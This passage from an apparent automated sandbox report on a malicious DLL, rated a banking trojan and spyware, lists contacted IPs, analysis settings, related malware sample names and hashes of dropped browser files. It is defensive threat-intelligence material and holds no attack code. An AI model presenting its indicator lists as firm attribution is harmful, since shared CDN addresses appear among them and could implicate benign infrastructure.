                                                                                                                                                    http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.yahoo.co.jpexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.target.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://buscador.terra.es/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.typography.netDexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://fontfabrik.comexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://search.orange.co.uk/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.iask.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.tesco.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                            high

Contacted IPs


Public

IP             Domain   Country        ASN     ASN Name                                     Malicious
34.65.144.159  unknown  United States  139070  GOOGLE-AS-AP Google Asia Pacific Pte Ltd SG  false
104.20.184.68  unknown  United States  13335   CLOUDFLARENET US                             false
151.101.1.44   unknown  United States  54113   FASTLY US                                    false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 353243
Start date: 15.02.2021
Start time: 21:25:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 38s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: NJPcHPuRcG.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winDLL@36/159@18/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 22.6% (good quality ratio 21.4%)
• Quality average: 79.2%
• Quality standard deviation: 29.1%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
                                                                                                                                                            Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Created / dropped Files have been reduced to 100
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time      Type              Description
21:27:01  API Interceptor   36x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match            Associated Sample Name / URL                        Detection   Context
104.20.184.68    DUcKsYsyX0.dll                                      malicious
                 RI51uAIUyL.dll                                      malicious
                 Server.exe                                          malicious
                 mon48_cr.dll                                        malicious
                 SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll    malicious
                 Wh102yYa..dll                                       malicious
                 SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll    malicious
                 SecuriteInfo.com.Variant.Bulz.349310.24122.dll      malicious
                 acr1.dll                                            malicious
                 TRIGANOcr.dll                                       malicious
                 BullGuard.dll                                       malicious
                 Jidert.dll                                          malicious
                 Vu2QRHVR8C.dll                                      malicious
                 header[1].jpg.dll                                   malicious
                 SimpleAudio.dll                                     malicious
                 cSPuZxa7I4.dll                                      malicious
                 umAuo1QklZ.dll                                      malicious
                 A6C8E866.xlsx                                       malicious
                 UGPK60taH6.dll                                      malicious
                 usd2.dll                                            malicious

Domains

Match                          Associated Sample Name / URL                        Detection   Context
tls13.taboola.map.fastly.net   DUcKsYsyX0.dll                                      malicious   151.101.1.44
                               RI51uAIUyL.dll                                      malicious   151.101.1.44
                               ZRz0Aq1Rf0.dll                                      malicious   151.101.1.44
                               mon44_cr.dll                                        malicious   151.101.1.44
                               mon41_cr.dll                                        malicious   151.101.1.44
                               mon4498.dll                                         malicious   151.101.1.44
                               e888888888.dll                                      malicious   151.101.1.44
                               1233.exe                                            malicious   151.101.1.44
                               Server.exe                                          malicious   151.101.1.44
                               2200.dll                                            malicious   151.101.1.44
                               mon48_cr.dll                                        malicious   151.101.1.44
                               SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll    malicious   151.101.1.44
                               SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll    malicious   151.101.1.44
                               8.prtyok.dll                                        malicious   151.101.1.44
                               SecuriteInfo.com.Variant.Bulz.349310.9384.dll       malicious   151.101.1.44
                               SecuriteInfo.com.Variant.Razy.840176.14264.dll      malicious   151.101.1.44
                               SecuriteInfo.com.Variant.Bulz.349310.24122.dll      malicious   151.101.1.44
                               login.jpg.dll                                       malicious   151.101.1.44
                               footer.jpg.dll                                      malicious   151.101.1.44
                               acr1.dll                                            malicious   151.101.1.44
contextual.media.net           DUcKsYsyX0.dll                                      malicious   23.210.250.97
                               RI51uAIUyL.dll                                      malicious   23.210.250.97
                               ZRz0Aq1Rf0.dll                                      malicious   23.210.250.97
                               mon44_cr.dll                                        malicious   23.210.250.97
                               mon41_cr.dll                                        malicious   184.30.24.22
                               mon4498.dll                                         malicious   184.30.24.22
                               e888888888.dll                                      malicious   23.218.208.23
                               1233.exe                                            malicious   184.30.24.22
                               Server.exe                                          malicious   184.30.24.22
                               2200.dll                                            malicious   184.30.24.22
                               mon48_cr.dll                                        malicious   184.30.24.22
                               SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll    malicious   92.122.253.103
                               Wh102yYa..dll                                       malicious   23.210.250.97
                               SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll    malicious   2.20.86.97
                               8.prtyok.dll                                        malicious   104.84.56.24
                               SecuriteInfo.com.Variant.Bulz.349310.9384.dll       malicious   104.84.56.24
                               SecuriteInfo.com.Variant.Razy.840176.14264.dll      malicious   104.84.56.24
                               SecuriteInfo.com.Variant.Bulz.349310.24122.dll      malicious   104.84.56.24
                               login.jpg.dll                                       malicious   104.84.56.24
                               footer.jpg.dll                                      malicious   184.30.24.22

ASN

Match: GOOGLE-AS-AP Google Asia Pacific Pte Ltd SG

Associated Sample Name / URL | Detection | Context
CompensationClaim-1625519734-02022021.xls | malicious | 34.66.107.230
CompensationClaim-1625519734-02022021.xls | malicious | 34.66.107.230
SecuriteInfo.com.BehavesLike.Win32.Emotet.jc.exe | malicious | 34.65.61.179
CompensationClaim-1828072340-02022021.xls | malicious | 34.66.107.230
CompensationClaim-1828072340-02022021.xls | malicious | 34.66.107.230
CompensationClaim-1378529713-02022021.xls | malicious | 34.66.107.230
CompensationClaim-1378529713-02022021.xls | malicious | 34.66.107.230
oHqMFmPndx.exe | malicious | 34.119.201.254
Documentation__EG382U8V.doc | malicious | 34.67.99.22
#Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htm | malicious | 34.101.72.248
#Ud83c#Udfb6 03 November, 2020 prodriguez@fnbsm.com.wavv.htm | malicious | 34.101.72.248
http://49.120.66.34.bc.googleusercontent.com/osh?email=bob@microsoft.com | malicious | 34.66.120.49
SecuriteInfo.com.Heur.13242.doc | malicious | 34.67.97.45
8845_2020_09_29.doc | malicious | 34.67.97.45
QgpyVFbQ7w.exe | malicious | 34.65.231.1
qySMTADEjr.exe | malicious | 34.65.231.1
SecuriteInfo.com.Trojan.Siggen10.9113.10424.exe | malicious | 34.65.231.1
SecuriteInfo.com.Trojan.Siggen10.9265.86.exe | malicious | 34.65.231.1
Dlya sverki 13.07.2020.exe | malicious | 34.67.67.23
u17mv3Hf1BdS3fQ.exe | malicious | 34.66.135.39

JA3 Fingerprints

Match: 9e10692f1b7f78228b2d4e424db3a98c

Associated Sample Name / URL | Detection | Context
DUcKsYsyX0.dll | malicious | 104.20.184.68, 151.101.1.44
7eec14e7cec4dc93fbf53e08998b2340.exe | malicious | 104.20.184.68, 151.101.1.44
RI51uAIUyL.dll | malicious | 104.20.184.68, 151.101.1.44
L257MJZ0TP.htm | malicious | 104.20.184.68, 151.101.1.44
brewin-02-02-21 Statement_763108amFtZXMubXV0aW1lcg==.htm | malicious | 104.20.184.68, 151.101.1.44
658908343Bel.html | malicious | 104.20.184.68, 151.101.1.44
P178979.htm | malicious | 104.20.184.68, 151.101.1.44
03728d6617cd13b19bd69625f7ead202.exe | malicious | 104.20.184.68, 151.101.1.44
PO 20191003.exe | malicious | 104.20.184.68, 151.101.1.44
SecuriteInfo.com.Trojan.GenericKD.36134277.347.exe | malicious | 104.20.184.68, 151.101.1.44
SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exe | malicious | 104.20.184.68, 151.101.1.44
ZRz0Aq1Rf0.dll | malicious | 104.20.184.68, 151.101.1.44
mon44_cr.dll | malicious | 104.20.184.68, 151.101.1.44
mon41_cr.dll | malicious | 104.20.184.68, 151.101.1.44
mon4498.dll | malicious | 104.20.184.68, 151.101.1.44
e888888888.dll | malicious | 104.20.184.68, 151.101.1.44
658908343Bel.html | malicious | 104.20.184.68, 151.101.1.44
Invoice due.html | malicious | 104.20.184.68, 151.101.1.44
One Note celine.wilcox@brewin.co.uk.html | malicious | 104.20.184.68, 151.101.1.44
#Ud83d#Udcde Herbalife.com AudioMessage_50-74981.htm | malicious | 104.20.184.68, 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 13
Entropy (8bit): 2.469670487371862
Encrypted: false
SSDEEP: 3:D90aKb:JFKb
MD5: C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1: 35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256: B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512: 6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious: false
Preview: <root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 2987
Entropy (8bit): 4.950739398644496
Encrypted: false
SSDEEP: 48:L7Di7Di7DiRDiRDiRDiRDgvDiRDitiDitiDitiDitiDiaDiaDiaDiaDEzDb/Dian:PccmmmmMvmLLLLNNNN4zXN4zXN4zX7Nz
MD5: 4002DB67F61887BCA5898C7997AC014C
SHA1: 2E587DB846AF0FDCF4D743019F72DB389DAB917F
SHA-256: AE3EEBB15C9EDF6CF865B12F4A49A1412593CD3D36D644A7AC32ABB299479773
SHA-512: AD636FC71BF218171A8C4DD62E74F4E698DDB0923BEA8DCC1DA4E7819D20D9F667122A5522645D32F1592C1972BADEAB9B94EC6D57F12E11C34FC54B26E33054
Malicious: false
Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /><item name="mntest" value="mntest" ltime="1028757264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 89384
Entropy (8bit): 2.192324357918229
Encrypted: false
SSDEEP: 384:r01P++6xBuao+I5Cxd8yl5310hRr0pp6Kpf:jnP/36Dwn
MD5: D420899BEEE44BD14AA77B5D83D105F9
SHA1: 631FA2669185BC3D5BFB987EF86B32F84EBBFE38
SHA-256: 2C35FCB224B152E0F731040DC76B553674B9FFA4D18EA8EC0A4D8D694C5CC462
                                                                                                                                                                                                    SHA-512:B56DB5424E78A3900CE9A595C856BB3743942202154EED7095650907987EABFF65571EB336F1E665D6D5FDA6A7A659660CC05DA50FC8D37159EBF6ADF7FF5488
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{75BD31D4-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):359948
                                                                                                                                                                                                    Entropy (8bit):3.628670384757461
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:8Z/2BfcYmu5kLTzGtHZ/2Bfc/mu5kLTzGt5Z/2BfcYmu5kLTzGtoZ/2Bfc/mu5kF:12xJB
                                                                                                                                                                                                    MD5:2C0FCAD5AFD9BA9EC507824C8ADBE212
                                                                                                                                                                                                    SHA1:66C3D4158ED59F2E89DF1F3C23E4574AC264E141
                                                                                                                                                                                                    SHA-256:88DAFA665A36D0A9F8F19327F642AB2250F02778CB0DF65B1B6672B21556C201
                                                                                                                                                                                                    SHA-512:A30DCF8774E2A3E10445FC6132F92A9D5146DE2DDB23F23069AD7F4E9A0421C67B725F7E342619E48F6C2304C18AD4772371C658A12C042EF75D76EE824148FE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE525F-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):28156
                                                                                                                                                                                                    Entropy (8bit):1.923906601902166
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:riZZQI6ykUjx2NWAMgdhXoVQM4qQilhXoVMXoVQM4qIA:re+TrGgkVchqxjhRqxL
                                                                                                                                                                                                    MD5:3AAEB9337106F1A7AB89D5BCD970658C
                                                                                                                                                                                                    SHA1:377AF013931328C63D11F3F87ED803DC3D665C7D
                                                                                                                                                                                                    SHA-256:2D7B641649F49FCBF183F54816B20EA00AA8B420D6EB47D20986A97C057AD756
                                                                                                                                                                                                    SHA-512:3AE34FE52BF0154F2C793DCDD299144590AF1456FE98C76AB20C8055A88BBEF5C3CE564CF8AFE9BBF9771E2A3F13BAC383D8F7EDFDBE8AEB1CC9E7D88163EC63
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5261-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):28160
                                                                                                                                                                                                    Entropy (8bit):1.9190881858140454
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:rrZMQT6BBSSjB2+WXMrJfcQC67tyVcjQC67t6A:rrZMQT6BkSjB2+WXMrpc6YVcj6EA
                                                                                                                                                                                                    MD5:BE96385D153AFE49884FA03BDC5CFB96
                                                                                                                                                                                                    SHA1:2A9E7E7EDFBB8ED7008D7BA40411A49620712D8C
                                                                                                                                                                                                    SHA-256:6DFF5555C415C52EFE5112E6B8346D3918DF9FD098F0DB580D7CE00B72067206
                                                                                                                                                                                                    SHA-512:B230CF0DF24E10F399574FB5582054E8A0C973FF4D430B6B8962B9C98C59E3C19DC33302E623E467B28A1BBE4D46DCF83849A4BC1AA3CF5BB220E00041795BF7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5263-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):28152
                                                                                                                                                                                                    Entropy (8bit):1.922873310389224
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:rWoZ4pQ66QkYjFP2FjWFAMFIxXtirylXsirRA:rWo4OldaQM/eddcn
                                                                                                                                                                                                    MD5:3F2D1D72B7A639775AA6071E31013D5B
                                                                                                                                                                                                    SHA1:30258AB053BE2CCAF1A3B299A44AD4B21761A41F
                                                                                                                                                                                                    SHA-256:447DBBB78248E4E68E531EC6D78F41680632E281DA0B11037B6D1E882F08441F
                                                                                                                                                                                                    SHA-512:23A65E5622267A408E0AA9A35D846306F954CD26B98F0D851DBB162064790B52861B4640B7FF323C3ED17914D03BBE7D8507A195B0D1D892A74B3F37D50E110F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):657
                                                                                                                                                                                                    Entropy (8bit):5.101786761714895
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:TMHdNMNxOEsDEODE1nWimI002EtM3MHdNMNxOEsDEOubov1nWimI00ONVbkEtMb:2d6NxO5DVDKSZHKd6NxO5DVubMSZ7Qb
                                                                                                                                                                                                    MD5:26421A59E71CF110E4AC15E5F656DD3F
                                                                                                                                                                                                    SHA1:172FF7C049329F1F75CAB3F17E476F471A0321FD
                                                                                                                                                                                                    SHA-256:756FC747DEAD21ECDDAA3D1790AA179AF440F81F907D96DC2703E50B424D6E35
                                                                                                                                                                                                    SHA-512:34CDA2239D4FDE19DFB08FE6B1C5483EAAAB1F28ABBC866CD0DDA152EE0E47265874A91FED1C1EC228E5712A25377FE484A4AC5B229A56B5D3A459527209E23C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d85ffbe,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):654
                                                                                                                                                                                                    Entropy (8bit):5.107887880469443
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:TMHdNMNxe2ksSe2vOSe2v1nWimI002EtM3MHdNMNxe2ksSe2vOSe2v1nWimI00OV:2d6NxrZSZWSZ9SZHKd6NxrZSZWSZ9SZp
                                                                                                                                                                                                    MD5:F336536B5D1CE5BBCE97C055719011CE
                                                                                                                                                                                                    SHA1:27836D16DBEFE80112427579D0232494DC798DF9
                                                                                                                                                                                                    SHA-256:527449C7093524404B88BF288C6FF2F7EF4A4EE7A82007AADC36D122270B5E91
                                                                                                                                                                                                    SHA-512:990360EBF64434A8F65B22A8A50A1E4C35981B9994969CB959D271A4AD6B5A0F4065D2A6A5C82DEA0D01F02389639DEFCC84BA0C3B92353C573DEFBB6DB9DFE2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x4d7ed8b4,0x01d70424</date><accdate>0x4d7ed8b4,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x4d7ed8b4,0x01d70424</date><accdate>0x4d7ed8b4,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):663
Entropy (8bit):5.131508779601073
Encrypted:false
SSDEEP:12:TMHdNMNxvLsubovOubov1nWimI002EtM3MHdNMNxvLsubovOubov1nWimI00ONmf:2d6NxvwubPubMSZHKd6NxvwubPubMSZW
MD5:A1E24723860EE0037651143F9D068D59
SHA1:49BE561D08BF3399A4677DFCB7D2E0BB27D44F70
SHA-256:1928298172506081F86FACF136EB9826DBB6E64EA33896878B6E740672D25BAB
SHA-512:05889A519FEDB845DD10159DB7E56B88B219BEC9CB13DB1AC612DAB6915EF70198F7ED7455A889925883E9D9E4428D6D9A34D04E89953B8E999E61DBEA4D20CD
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):648
Entropy (8bit):5.139263329290746
Encrypted:false
SSDEEP:12:TMHdNMNxisUmBOUmB1nWimI002EtM3MHdNMNxisUmBOUmB1nWimI00ONd5EtMb:2d6NxnQXSZHKd6NxnQXSZ7njb
MD5:3B529125BD6379006CDA7C1A5ED37F7C
SHA1:0D3E7995A50F0BF28510B56BC96F695607263F9B
SHA-256:A101BF6A09028047BBB050480E67881D532913AF6EDA017FF7B3F7B625686F1E
SHA-512:E363F87E12ED659D1B9294C92D856B682D9EA66D8D546F175D13C6337FC56B44B2C99C22373F9D7405A5FE30BDB7621E203C5D883049663A5B2910797C8F4EF2
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):657
Entropy (8bit):5.147199382375345
Encrypted:false
SSDEEP:12:TMHdNMNxhGwsubovOubov1nWimI002EtM3MHdNMNxhGwsubovOubov1nWimI00Oo:2d6NxQFubPubMSZHKd6NxQFubPubMSZ0
MD5:BC08ABFC16F82A8403E7B707F5D7D546
SHA1:F00E7F1D5C385B42E5A22F9825ED2B1577293FA1
SHA-256:FB378A7246765CDC16BC4A3E1D8278E36D8DC24B9181183E4A7555BB72A9AFE0
SHA-512:8EE1EB85CE445E2BFB6DC6F06BD000BF86C63C207570272210666E79B8181E4D024223D3D4A97E0D88A99972570BCE21872886EB371C69321042AEF7F135BB2D
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):654
Entropy (8bit):5.091407562482365
Encrypted:false
SSDEEP:12:TMHdNMNx0nsDEODE1nWimI002EtM3MHdNMNx0nsDEODE1nWimI00ONxEtMb:2d6Nx0sDVDKSZHKd6Nx0sDVDKSZ7Vb
MD5:AAA0C78C3A42B1558E7FCA987129183E
SHA1:F9EDE5CF8DC9E6D792DF9784F252A5333A7A74FD
SHA-256:4E54F244C560E3E91010A584E28DAF3CD189A868A8578AB270B4F4DADB3ECB3E
